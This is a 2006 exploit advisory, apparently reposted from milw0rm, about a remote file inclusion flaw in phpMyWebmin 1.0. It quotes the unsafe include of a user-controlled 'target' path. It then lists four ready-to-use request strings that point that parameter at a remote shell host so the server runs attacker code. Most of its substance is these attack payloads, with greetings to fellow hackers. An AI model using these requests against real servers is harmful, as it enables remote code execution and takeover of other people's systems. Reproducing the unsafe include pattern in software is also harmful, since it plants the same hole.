phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability

x0r0n Mon, 02 Oct 2006 09:13:08 -0700

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Discovered by XORON(turkish hacker)


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


URL: 
http://www.josh.ch/joshch/joshch/_content_data/phpmywebmin/phpMyWebmin10.zip


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Vuln. Code: include("$target/$folder/preferences.php");


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Exploit: /change_preferences2.php?target=http://SH3LL?

         /create_file.php?target=http://SH3LL?

         /upload_local.php?target=http://SH3LL?

         /upload_multi.php?target=http://SH3LL?


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Thanx: str0ke, Preddy, Ironfist, Stansar, Kernel-32 ;)


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


# milw0rm.com [2006-09-30]

phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability

Reply via email to